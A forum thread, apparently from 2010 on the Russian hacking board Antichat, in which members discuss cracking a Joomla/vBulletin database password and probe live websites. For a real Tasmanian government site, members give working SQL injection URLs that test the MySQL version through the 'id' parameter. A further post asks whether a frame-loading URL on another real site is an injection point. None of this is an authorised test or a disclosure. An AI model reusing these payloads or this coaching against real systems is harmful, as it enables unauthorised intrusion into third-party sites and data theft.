HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.05.2010, 15:22
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами: 8456812

Репутация: 55
По умолчанию

Цитата:
Сообщение от mr.celt  
Что-то мне подсказывает, что это joomla
Она самая,а что?
 
Ответить с цитированием

  #2  
Старый 31.05.2010, 15:31
mr.celt
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами: 9610572

Репутация: 32
По умолчанию

Цитата:
Сообщение от ~d0s~  
Она самая,а что?
Потому что в joomle во многих случаях используется чистый md5 хешь.
Я так понимаю доступа к базе нет, соответственно и хешь получить не можешь.
 
Ответить с цитированием

  #3  
Старый 31.05.2010, 15:37
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами: 8456812

Репутация: 55
По умолчанию

Цитата:
Сообщение от mr.celt  
Потому что в joomle во многих случаях используется чистый md5 хешь.
Я так понимаю доступа к базе нет, соответственно и хешь получить не можешь.
Ну еслибы был доступ к базе,я бы щас ничего уже не спрашивал
Токо вот вопрос был,можно ли как-то сбрутить пасс от бд,зная все данные кроме пасса,а не какой алгоритм шифрования в джумле.
P.S.Ну в джумле я раньше встречал только алгоритм md5($pass.$salt).Вообще,тут не все так просто,там еще стоит итеграция базы форума(vbulletin) и сайта(joomla).

Последний раз редактировалось ~d0s~; 31.05.2010 в 15:39..
 
Ответить с цитированием

  #4  
Старый 31.05.2010, 16:15
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию

не видел никояда пасс от бд бил мд5//
 
Ответить с цитированием

  #5  
Старый 31.05.2010, 16:19
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами: 8602291

Репутация: 256


По умолчанию

Скажите, как быть, если вот такая ошибка:
Цитата:
Database error: Invalid SQL: SELECT * FROM page WHERE id = 66ý AND (status = 'active' OR status = 'locked') AND date_push < '2010-05-31 22:17:16' AND (date_pull = '0000-00-00 00:00:00' OR date_pull > '2010-05-31 22:17:16') ORDER BY rank
MySQL Error: 1054 (Unknown column '66ý' in 'where clause')
Session halted.
Можно ли провести инъекцию в таком случае? Вот линк:
Цитата:
http://www.bicentenary.tas.gov.au/page.php?id=66%FD
 
Ответить с цитированием

  #6  
Старый 31.05.2010, 16:40
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от CyberHunter  
Скажите, как быть, если вот такая ошибка:

Можно ли провести инъекцию в таком случае? Вот линк:
попробуй):

Код:
http://www.bicentenary.tas.gov.au/page.php?id=-66+or+1=1+and+substring(version(),1,1)=3
 
Ответить с цитированием

  #7  
Старый 31.05.2010, 16:41
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами: 9100556

Репутация: 912
По умолчанию

2 CyberHunter

http://www.bicentenary.tas.gov.au/print.php?id=127+and+substring(version(),1,1)=3
3 ветка
 
Ответить с цитированием

  #8  
Старый 31.05.2010, 19:20
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

http://www.johnrausch.com/PuzzleWorld/toc.asp?t=_cat/io001.htm&m=https://forum.antichat.ru
открывается в фрейме

и как это понять? asp инъекция?

вот только asp файлы не интерпретируются...
 
Ответить с цитированием

  #9  
Старый 31.05.2010, 19:42
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Цитата:
Сообщение от Konqi  
http://www.johnrausch.com/PuzzleWorld/toc.asp?t=_cat/io001.htm&m=https://forum.antichat.ru
открывается в фрейме

и как это понять? asp инъекция?

вот только asp файлы не интерпретируются...
*FACEPALM*
Ну раз фрейм, какая нах asp инъекция?
Уважаемые ачатовцы, вы меня с каждым днём всё больше удивляйте со своими вопросами.
Цитата:
Сообщение от pinch  
у некоторых мания величия...
А помоему кто-то тупо набивает посты и хочет быть в бане.
И не мания величия это, а обычная реакция на вопросы типа:
"Пишу -1 union select 1, а мне в ответ The used SELECT statements have a different number of columns".
И то что я тебя упомянул в прошлом посте, ты заслужил этого.

Последний раз редактировалось Ctacok; 31.05.2010 в 20:08..
 
Ответить с цитированием

  #10  
Старый 31.05.2010, 19:53
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от Ctacok  
*FACEPALM*
Ну раз фрейм, какая нах asp инъекция?
Уважаемые ачатовцы, вы меня с каждым днём всё больше удивляйте со своими вопросами.
первый раз встречал,и поэтому не был уверен..а так понял .спс ))
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.